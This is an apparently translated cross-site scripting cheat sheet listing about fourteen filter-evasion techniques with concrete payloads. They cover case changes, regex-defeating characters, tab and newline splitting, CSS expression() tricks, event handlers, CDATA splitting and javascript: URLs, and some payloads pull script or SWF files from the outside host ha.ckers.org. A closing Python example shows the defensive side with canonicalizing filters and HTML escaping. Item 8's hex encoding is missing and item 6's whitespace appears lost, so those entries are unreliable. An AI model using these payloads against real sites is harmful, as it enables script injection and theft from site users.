1. Change the case of characters

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
  background-image: url('javascript:alert("XSS");')
}

5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade (the gaps in the scheme below are tab or newline characters)

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> newline

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in HTML tag attributes

<body onload="alert('onload')">

Event handler attributes: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. Put the XSS code inside an swf

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and let the browser reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
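To show the defender's side of items 1, 2, 5, 6 and 7 above, here is an added Python example (not part of the original post) that runs samples modelled on the listed payloads through a naive case-sensitive blacklist, then through a canonicalize-then-match step that undoes those obfuscations, and finally through contextual HTML output encoding, which is the fix that does not depend on guessing every variant. The sample strings and the regex patterns are constructed for this example.

```python
import html
import re

# Constructed samples, each modelled on one evasion from the list above.
SAMPLES = [
    '<sCript>alert("d")</scRipT>',                              # 1: mixed case
    '<SCRIPT/SRC="t.js"></SCRIPT>',                             # 5: "/" instead of space
    '<img src="jav\tascr\nipt:alert(\'XSS3\')">',               # 6: tab/newline in scheme
    '<DIV STYLE="width: expre\\ssi\\on(alert(\'XSS31\'));">',   # 7: backslash splits keyword
    '<IMG STYLE="xss:expr/*anyword*/ession(alert(\'sss\'))">',  # 7: CSS comment splits keyword
]

# The kind of case-sensitive blacklist every entry above is designed to slip past.
NAIVE = re.compile(r'<script>|javascript:|expression\(')
# Same intent, applied after canonicalization.
CANON = re.compile(r'<script\b|javascript:|expression\(')


def naive_filter_blocks(s: str) -> bool:
    return NAIVE.search(s) is not None


def canonicalize(s: str) -> str:
    """Undo the listed obfuscations before matching: case, CSS comments,
    CSS backslash escapes, control characters, and "/" after a tag name."""
    t = s.lower()
    t = re.sub(r'/\*.*?\*/', '', t, flags=re.S)   # expr/*x*/ession -> expression
    t = t.replace('\\', '')                        # expre\ssi\on    -> expression
    t = re.sub(r'[\x00-\x1f]', '', t)              # jav<TAB>ascr<LF>ipt -> javascript
    t = re.sub(r'<(\w+)/', r'<\1 ', t)             # <script/src     -> <script src
    return t


def canonical_filter_blocks(s: str) -> bool:
    return CANON.search(canonicalize(s)) is not None


def render_safely(s: str) -> str:
    """The robust fix: encode for the HTML text context instead of hunting
    for bad patterns, so none of the samples ever becomes markup."""
    return html.escape(s, quote=True)


def evasions_missed_by_naive() -> int:
    """How many of the samples the naive blacklist lets through."""
    return sum(1 for s in SAMPLES if not naive_filter_blocks(s))


if __name__ == '__main__':
    for s in SAMPLES:
        print(naive_filter_blocks(s), canonical_filter_blocks(s), render_safely(s))
```

Canonicalization only covers the tricks enumerated here; every new browser quirk adds another case, which is why output encoding per context is the primary control and pattern matching is at best a secondary signal.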